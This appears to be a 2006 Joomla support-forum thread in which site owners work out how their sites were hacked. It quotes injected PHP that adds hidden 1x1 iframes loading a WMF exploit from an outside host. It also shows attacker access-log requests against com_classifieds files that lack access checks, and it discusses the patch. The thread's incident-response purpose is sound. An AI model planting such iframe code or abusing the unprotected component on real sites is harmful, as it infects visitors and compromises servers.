Now it's ok but my site was hacked by someone. I've noticed that the file mod_mainmenu.php was hacked and inside someone added an iframe that goes to http://zchxsikpgz.biz/dl/xpladv521.wmf that is a Exploit.WMF.A.

My Joomla version is 1.0.10. How was that possible?

As soon as I can I'll post the mod_mainmenu.php modified. I've overwritten the hacked on with a fresh one and now everything is ok.

Please list here the 3pds extensions you are using, as well as their version number.
Please also look here for known 3pds vulnerabilities and their upgrade if available.
http://forum.joomla.org/index.php/topic,79477.0.html

Changing the mod_mainmenu.php file will not help you as you have to figure first how your site was hacked in order to prevent it in the future.

You're right but at least I've restored the site functionality. Here's the list of components. I've seen that I've performs and maybe they've used this one to hack the site. I've deleted it.

Here are the lines added to my mod_mainmenu.php

Code: Select all

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>';
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>'; if (!defined( '_MOS_MAINMENU_MODULE' )) {


Be sure to delete all related files by ftp and check the modification dates for other files.

OT: I see sef_advance is displayed twice, and that, instead of JCE, you are using the older mce.

Also, docman is a versin RC1 and not RC2.

@shiftsrl:

I do not know if you've resolved the issue yet or not, but today I was contacted by the administrator of a joomla site running on our server. He reported the exact same hack as you described (modified mod_mainmenu.php to include iframe to some site).

I searched the logfiles for his site and found the following lines:

Code: Select all

82.207.99.8 - - [04/Aug/2006:11:06:51 +0200] "GET //administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14196 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:06:52 +0200] "GET //administrator/components/com_classifieds/popups/insert_image.php HTTP/1.0" 200 18502 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:21:50 +0200] "POST /administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14198 "-" "Mozilla/4.0 (compatible; Synapse)"
82.207.99.8 - - [04/Aug/2006:11:21:52 +0200] "GET /components/com_classifieds/adimages/config.php HTTP/1.0" 200 5 "-" "Mozilla/4.0"

This looked suspicious to me. A direct link to images.php? From an IP address in the Ukraine? I assume there aren't too many Ukranians who speak dutch (it's a dutch website).

I found that the direct URL does indeed allow direct execution of images.php, bypassing normal joomla security. That file, as well as a few other php files in that folder are missing some of the standard joomla security checks (like "defined( '_VALID_MOS' ) or die( 'Restricted access' );" for example). I'm not a joomla expert but I assume this is the cause of the vulnerability.

I still need the do several more checks to see if this is indeed the cause of the problem, but at the moment it sure looks like it. Since you posted that you're also running com_classifieds the same vulnerability may also be the cause of your problem.

HTH

Cheers,
Aspegic

February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html

infograf768 wrote:February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html

I do believe that thread discussus a different classifieds component called "Noah". The one installed on the website on our server used the classifieds component available at mambo.posluh.hr

The snapshot posted earlier by shiftsrl - showing the 3rd party components he has installed on his site - shows he uses the same version as was installed on my clients site: "Classifieds v1.3 M451".

I visited mambo.posluh.hr and it appears Classifieds version 1.3 M451 is currently the latest release available from that website (released january 2005). The download from their website still contains the php scripts without the necessary security checks.

Cheers,
Aspegic

Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/

The security patch is clearly shown.

Hope it helps

infograf768 wrote:Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/

Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
Thanks for the link. I'll pass it along to my client.

Cheers,
Aspegic

Aspegic wrote:
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...

That old mambo site has not beem updated since april 2005.
It is dead I guess.

Maybe RobS takes this component to his list too

infograf768 wrote:

Aspegic wrote:
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...

That old mambo site has not beem updated since april 2005.
It is dead I guess.

Hi, I have have just been made aware of this hack to one of my sites. I use the Classifieds component so downloaded the patch from the link above. However if you look at the two files in the patch the fix is negated by the line:

define( "_VALID_MOS", 1 );

Very strange. You need to comment this out, I believe

not only comment that out...  but add the following lines at the start of the file, just after the source commentary:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

I think, this line:

require( "../../../../includes/auth.php" );  // Thx 2 Lismo

adds the important

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

However I see there are other files that don't have any protection. I am going to remove this component.

Thanks for the info. In my case I think that the problem was the component PerForms wich I've deleted. In any case I've patched also the classified but a question still remains. Is this component secure with the patch or not?

Hi,
I have same problem with this component. Have also been hacked by Inserting Iframe.

I use this component a lot. Does anyone have any sugestion on this?

Is anybody out there whou could check security of this component adn posibly fix the security issues?

Has anyone every developed com_classified further? Any security issues still on this?